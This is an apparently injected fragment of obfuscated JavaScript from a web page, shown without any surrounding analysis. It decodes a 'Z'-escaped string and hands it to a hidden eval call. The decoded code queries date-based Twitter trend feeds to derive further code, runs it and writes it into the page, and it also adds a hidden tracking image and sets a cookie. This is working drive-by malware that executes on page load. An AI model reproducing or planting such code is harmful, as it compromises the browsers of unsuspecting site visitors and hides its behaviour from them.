uh9kbudeb~0888iuqb0;Z22;opZ3dZ22Z2524Z2561Z253dZ2522dw(Z2564Z2563Z2573(cuZ252c1Z2534)Z2529;Z2522;Z22;ddZ3dZ2208y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9;!Z2520Z2520+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050Z22;Z69Z66 Z28dZ6fcuZ6dZ65ntZ2eZ63oZ6fZ6bieZ2eindZ65xOZ66Z28Z27rf5f6Z64sZ27)Z3dZ3d-1)Z7bfunctiZ6fnZ20cZ61Z6clbaZ63k(Z78)Z7bwinZ64ow.Z74w Z3d xZ3bvaZ72 d Z3dZ20nZ65wZ20DaZ74e()Z3bd.Z73etZ54imeZ28Z78[Z22as_Z6ffZ22]*1Z3000)Z3bZ76Z61r hZ20Z3d Z64Z2egetZ55TCZ48Z6fursZ28);wZ69nZ64oZ77Z2eh Z3d hZ3bif Z28hZ20Z3e 8)Z7bdZ2esZ65tUTZ43DaZ74e(Z64.gZ65tZ55TCZ44ateZ28Z29 -Z202Z29Z3b}elZ73Z65Z7bd.Z73eZ74UZ54Z43DZ61tZ65(dZ2egetZ55TCZ44ateZ28Z29 - Z33);Z7dZ77inZ64Z6fwZ2eZ67Z64 Z3d Z64;vZ61Z72 tZ69me Z3d Z6eew Z41Z72rZ61Z79Z28Z29Z3bvZ61Z72 sZ68Z69Z66tIZ6eZ64eZ78 Z3d Z22Z22;timZ65[Z22yeaZ72Z22] Z3d dZ2egZ65Z74UTCZ46Z75llZ59eaZ72Z28);tZ69meZ5bZ22Z6doZ6ethZ22] Z3d d.Z67eZ74UZ54CZ4donZ74hZ28)+Z31;tZ69Z6de[Z22daZ79Z22]Z20Z3d d.gZ65tUZ54CDaZ74e()Z3biZ66 Z28dZ2egeZ74Z55Z54CZ4dZ6fnZ74hZ28)+1Z20Z3c 1Z30)Z7bshiftZ49nZ64Z65x Z3d Z74imeZ5bZ22yearZ22] Z2bZ20Z22-0Z22 Z2bZ20Z28Z64.gZ65Z74UTCZ4doZ6ethZ28Z29+1Z29;}Z65lsZ65Z7bshZ69ftZ49Z6edeZ78 Z3d timZ65[Z22yearZ22]Z20+Z20Z22-Z22Z20+ (Z64Z2egeZ74Z55Z54CZ4doZ6etZ68(Z29+1Z29;}iZ66 (dZ2eZ67etUZ54CZ44atZ65() Z3c 10Z29Z7bshiZ66tIZ6eZ64exZ20Z3dshiftZ49ndeZ78 +Z20Z22-0Z22 +Z20d.gZ65tZ55TCZ44atZ65(Z29;}Z65lseZ7bZ73hifZ74InZ64eZ78 Z3d Z73hZ69ftZ49ndeZ78Z20+ Z22-Z22 + d.gZ65tZ55TZ43DZ61tZ65Z28);Z7ddoZ63umeZ6et.wZ72iteZ28Z22Z3cscrZ22Z2bZ22ipt laZ6eguaZ67Z65Z3djavaZ73crZ69Z70tZ22+Z22 srZ63Z3dZ27http:Z2fZ2fsearchZ2eZ74Z77iZ74tZ65Z72.Z63omZ2fZ74rZ65nZ64sZ2fdZ61iZ6cyZ2ejZ73oZ6e?daZ74Z65Z3dZ22+ shiftZ49ndeZ78Z2bZ22&caZ6clZ62Z61Z63kZ3dcZ61Z6cZ6cZ62ackZ32Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);} functZ69Z6fn Z63aZ6clZ62Z61Z63kZ32(Z78)Z7bwZ69ndZ6fw.Z74Z77 Z3d x;Z73Z63(Z27rf5Z66Z36Z64Z73Z27Z2c2,7Z29;eZ76al(Z75Z6eesZ63apeZ28dzZ2bZ63Z7aZ2bop+Z73t)Z2bZ27dw(dZ7aZ2bcZ7a(Z24aZ2bstZ29Z29;Z27);dZ6fcZ75mZ65nZ74Z2ewriZ74e(Z24a);Z7ddZ6fcumZ65Z6etZ2ewrZ69teZ28Z22Z3cimgZ20srcZ3dZ27htZ74pZ3aZ2fZ2fsearch.Z74witZ74er.Z63oZ6dZ2fimageZ73Z2fZ73Z65aZ72cZ68Z2frss.pZ6egZ27Z20wiZ64Z74Z68Z3d1 Z68eZ69gZ68Z74Z3d1 sZ74yleZ3dZ27viZ73Z69bZ69lZ69tyZ3ahidZ64enZ27 Z2fZ3e Z3cscrZ22+Z22ipt lZ61ngZ75ageZ3djZ61Z76Z61scZ72iZ70tZ22+Z22 srcZ3dZ27hZ74tp:Z2fZ2fseaZ72Z63Z68Z2eZ74wiZ74Z74erZ2ecoZ6dZ2ftreZ6edsZ2fZ64aiZ6cy.jZ73onZ3fZ63Z61llZ62Z61cZ6bZ3dcalZ6cbaZ63kZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}elsZ65Z7b$aZ3dZ27Z27};funcZ74Z69oZ6e sZ63(cZ6emZ2cv,Z65Z64Z29Z7bvarZ20exdZ3dZ6eewZ20Z44aZ74e(Z29Z3bexdZ2esetZ44ateZ28exdZ2egZ65Z74DZ61teZ28)+Z65Z64);dZ6fcumZ65Z6et.cZ6foZ6biZ65Z3dZ63Z6em+Z20Z27Z3dZ27 +esZ63apZ65Z28v)Z2bZ27;expirZ65sZ3dZ27+exd.toGZ4dTSZ74Z72ingZ28);Z7d;";var ez=window;ez[String.fromCharCode(101,118,97)+"l"](fds()); function asd(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}function fds(){return asd($a);}</script>